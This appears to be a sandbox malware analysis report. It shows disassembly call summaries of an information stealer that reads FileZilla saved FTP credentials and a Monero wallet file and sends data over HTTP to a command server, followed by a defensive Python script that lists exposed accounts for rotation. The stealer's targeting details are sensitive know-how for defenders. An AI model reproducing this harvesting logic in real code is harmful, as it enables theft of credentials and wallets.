                               • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Qn6:
                              • API String ID: 0-1605114166
                              • Opcode ID: d57371d5b2019501f2f94a5f623cd91be9abecafc793992b78b676dd6c78e357
                              • Instruction ID: be27e695e982d8a47ebb94bb3d753e1470fc95d43c15bba6ffdaeb21ebc3fa24
                              • Opcode Fuzzy Hash: d57371d5b2019501f2f94a5f623cd91be9abecafc793992b78b676dd6c78e357
                              • Instruction Fuzzy Hash: 3FB2C3F360C704AFE3047E29EC8567AFBE9EF94720F16493DE6C483744EA3599008696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 9I$C&?k
                              • API String ID: 0-2035176125
                              • Opcode ID: 0c9293cb53303aa64eb9327f34a35b23cfe727752533ae430d441cd9d4ad9e47
                              • Instruction ID: 9dc9202c2660c12905c4e55c5f794c007024d144a9f01f998696c9c605ce5bb8
                              • Opcode Fuzzy Hash: 0c9293cb53303aa64eb9327f34a35b23cfe727752533ae430d441cd9d4ad9e47
                              • Instruction Fuzzy Hash: 185115B3B152148BE3409E29DC84766B797EBC4310F2B813DCAC897784D93E5D0A8796
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /O_
                              • API String ID: 0-2000334091
                              • Opcode ID: b6fd63dcd4a30ed710438a32e98be47d9f53782bbb407e4880b664a75bb80ce0
                              • Instruction ID: 593d07faac4feccb7415de698b719b2f2f97e5e1263bac054a935e04763d9184
                              • Opcode Fuzzy Hash: b6fd63dcd4a30ed710438a32e98be47d9f53782bbb407e4880b664a75bb80ce0
                              • Instruction Fuzzy Hash: 0F5129F3F185145BF3046D2DDC5976BBADADBD4320F2A863DDA98C7784E9398C024286
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
                                • Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
                                • Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
                                • Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
                                • Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
                                • Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A
                                • Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00C00DBA,00C00DB7,00C00DB6,00C00DB3), ref: 00BF0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00BF0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00BF03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00BF0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00BF0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00BF0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00BF0571
                              • lstrcat.KERNEL32(?,url: ), ref: 00BF0580
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF0593
                              • lstrcat.KERNEL32(?,00C01678), ref: 00BF05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF05B5
                              • lstrcat.KERNEL32(?,00C0167C), ref: 00BF05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 00BF05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF05E6
                              • lstrcat.KERNEL32(?,00C01688), ref: 00BF05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00BF0604
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF0617
                              • lstrcat.KERNEL32(?,00C01698), ref: 00BF0626
                              • lstrcat.KERNEL32(?,00C0169C), ref: 00BF0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 08509a9bda8450c03d0db75fbe155d5e85cc54ba471663a63b42ed4ebf58df9e
                              • Instruction ID: a27f96396f09c909d7a9ef76ca57aa1bbaf04a8637444217d32f06ba0d821ee8
                              • Opcode Fuzzy Hash: 08509a9bda8450c03d0db75fbe155d5e85cc54ba471663a63b42ed4ebf58df9e
                              • Instruction Fuzzy Hash: 10D10EB191010CABCB18EBE4DD56EFEB3B8EF14340F544568F606B7095DA74AA0ECB61
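The function above reads %APPDATA%\FileZilla\recentservers.xml and pulls `<Host>`, `<Port>`, `<User>` and the base64-encoded `<Pass>` out of it, then emits "login:" / "password:" lines for the C2. For incident response the useful question is the inverse one: which accounts on this host were exposed and need rotation. The script below is an added triage helper, not code from the report or from the sample; the tag names match the report's string table, the XML document is constructed, and it deliberately never outputs the decoded password.

```python
"""
IR triage helper (added example, not part of the Joe Sandbox report or the sample):
list the FileZilla accounts a stealer with this routine would have harvested from
%APPDATA%\\FileZilla\\recentservers.xml, so they can be rotated. The
<Host>/<Port>/<User>/<Pass encoding="base64"> tag names come from the report's
string table; the XML below is a constructed sample document.
"""
import base64
import xml.etree.ElementTree as ET

SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
    <Server>
      <Host>sftp.internal.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Pass encoding="base64">c2VjcmV0</Pass>
    </Server>
    <Server>
      <Host>anon.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def exposed_accounts(xml_text):
    """Return [(host, port, user, password_recoverable)] for every <Server> that
    stored a credential. The password is decoded only to confirm it is
    recoverable; it is never returned, so the result can go straight into a
    rotation ticket without copying the secret around."""
    root = ET.fromstring(xml_text)
    out = []
    for srv in root.iter("Server"):
        host = srv.findtext("Host", "")
        port = int(srv.findtext("Port", "0") or 0)
        user = srv.findtext("User")
        pw = srv.find("Pass")
        if user is None or pw is None:
            continue  # anonymous / key-based logins leave no stored secret
        recoverable = False
        if pw.get("encoding") == "base64" and pw.text:
            try:
                base64.b64decode(pw.text, validate=True)
                recoverable = True
            except ValueError:
                pass  # malformed base64: nothing usable for an attacker either
        elif pw.text:
            recoverable = True  # older FileZilla builds stored it unencoded
        out.append((host, port, user, recoverable))
    return out


if __name__ == "__main__":
    for host, port, user, recoverable in exposed_accounts(SAMPLE_RECENTSERVERS):
        print(f"{user}@{host}:{port} stored_password={recoverable}")
```

Point it at the real recentservers.xml (and sitemanager.xml, which uses the same element names) from the affected profile; every row it prints is a credential the stealer's output stream would have contained.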
                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
                                • Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BE59F8
                              • StrCmpCA.SHLWAPI(?,009BF440), ref: 00BE5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,009BF500,00000000,?,009BE6D8,00000000,?,00C01A1C), ref: 00BE5E71
                              • lstrlen.KERNEL32(00000000), ref: 00BE5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00BE5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BE5E9A
                              • lstrlen.KERNEL32(00000000), ref: 00BE5EAF
                              • lstrlen.KERNEL32(00000000), ref: 00BE5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BE5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00BE5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BE5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BE5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00BE5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00BE5FBD
                              • HttpOpenRequestA.WININET(00000000,009BF4C0,?,009BEC40,00000000,00000000,00400100,00000000), ref: 00BE5BF8
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • InternetCloseHandle.WININET(00000000), ref: 00BE5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 30b211c67be22ab3fa7dd80280d58c669d70b90ff7aee1b233a51439bc347346
                              • Instruction ID: c7367306d200bb6fd75f97bf8232e76f2ccbb2322c5a44cf6f0eb521161c438f
                              • Opcode Fuzzy Hash: 30b211c67be22ab3fa7dd80280d58c669d70b90ff7aee1b233a51439bc347346
                              • Instruction Fuzzy Hash: 8F12CEB182011CABDB19EBA4DC95FEEB3B8BF14740F5441A9B20A73091DF706A4ECB55
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,009BE6A8,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BECF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BED0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BED0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED208
                              • lstrcat.KERNEL32(?,00C01478), ref: 00BED217
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED22A
                              • lstrcat.KERNEL32(?,00C0147C), ref: 00BED239
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED24C
                              • lstrcat.KERNEL32(?,00C01480), ref: 00BED25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED26E
                              • lstrcat.KERNEL32(?,00C01484), ref: 00BED27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED290
                              • lstrcat.KERNEL32(?,00C01488), ref: 00BED29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED2B2
                              • lstrcat.KERNEL32(?,00C0148C), ref: 00BED2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED2D4
                              • lstrcat.KERNEL32(?,00C01490), ref: 00BED2E3
                                • Part of subcall function 00BFA820: lstrlen.KERNEL32(00BE4F05,?,?,00BE4F05,00C00DDE), ref: 00BFA82B
                                • Part of subcall function 00BFA820: lstrcpy.KERNEL32(00C00DDE,00000000), ref: 00BFA885
                              • lstrlen.KERNEL32(?), ref: 00BED32A
                              • lstrlen.KERNEL32(?), ref: 00BED339
                                • Part of subcall function 00BFAA70: StrCmpCA.SHLWAPI(009B8BB8,00BEA7A7,?,00BEA7A7,009B8BB8), ref: 00BFAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00BED3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 54732910fe23dc062c6229e9147990b0312dc7a275a15576dde859d04da74659
                              • Instruction ID: d6aedd5e8ca3c7fe5652962946b81f8b60b0700feca549ef1b53fb79754902b2
                              • Opcode Fuzzy Hash: 54732910fe23dc062c6229e9147990b0312dc7a275a15576dde859d04da74659
                              • Instruction Fuzzy Hash: 25E1E4B19101099BCB18EBA5DD96EFE73B8AF14301F1441A4F606B7091DF756E0ECB62
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,009BD560,00000000,?,00C0144C,00000000,?,?), ref: 00BECA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BECA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00BECA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BECAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BECAD9
                              • StrStrA.SHLWAPI(?,009BD578,00C00B52), ref: 00BECAF7
                              • StrStrA.SHLWAPI(00000000,009BD590), ref: 00BECB1E
                              • StrStrA.SHLWAPI(?,009BDDE0,00000000,?,00C01458,00000000,?,00000000,00000000,?,009B8B28,00000000,?,00C01454,00000000,?), ref: 00BECCA2
                              • StrStrA.SHLWAPI(00000000,009BDD00), ref: 00BECCB9
                                • Part of subcall function 00BEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BEC871
                                • Part of subcall function 00BEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BEC87C
                              • StrStrA.SHLWAPI(?,009BDD00,00000000,?,00C0145C,00000000,?,00000000,009B8B88), ref: 00BECD5A
                              • StrStrA.SHLWAPI(00000000,009B89C8), ref: 00BECD71
                                • Part of subcall function 00BEC820: lstrcat.KERNEL32(?,00C00B46), ref: 00BEC943
                                • Part of subcall function 00BEC820: lstrcat.KERNEL32(?,00C00B47), ref: 00BEC957
                                • Part of subcall function 00BEC820: lstrcat.KERNEL32(?,00C00B4E), ref: 00BEC978
                              • lstrlen.KERNEL32(00000000), ref: 00BECE44
                              • CloseHandle.KERNEL32(00000000), ref: 00BECE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 74c3db2f1e8db3ad06192d0ff3c274647f14c5983abab218389267f8f6c65499
                              • Instruction ID: c9f39013255d08fe7e7f504414881af27ee350f94fb57fefec3d3f0db40f4ccc
                              • Opcode Fuzzy Hash: 74c3db2f1e8db3ad06192d0ff3c274647f14c5983abab218389267f8f6c65499
                              • Instruction Fuzzy Hash: FEE1E2B190010CABDB18EBA4DC55FEEB7B8AF14340F4441A9F60A77191DF706A4ECB65
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • RegOpenKeyExA.ADVAPI32(00000000,009BB7C8,00000000,00020019,00000000,00C005B6), ref: 00BF83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BF8426
                              • wsprintfA.USER32 ref: 00BF8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BF847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF8499
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
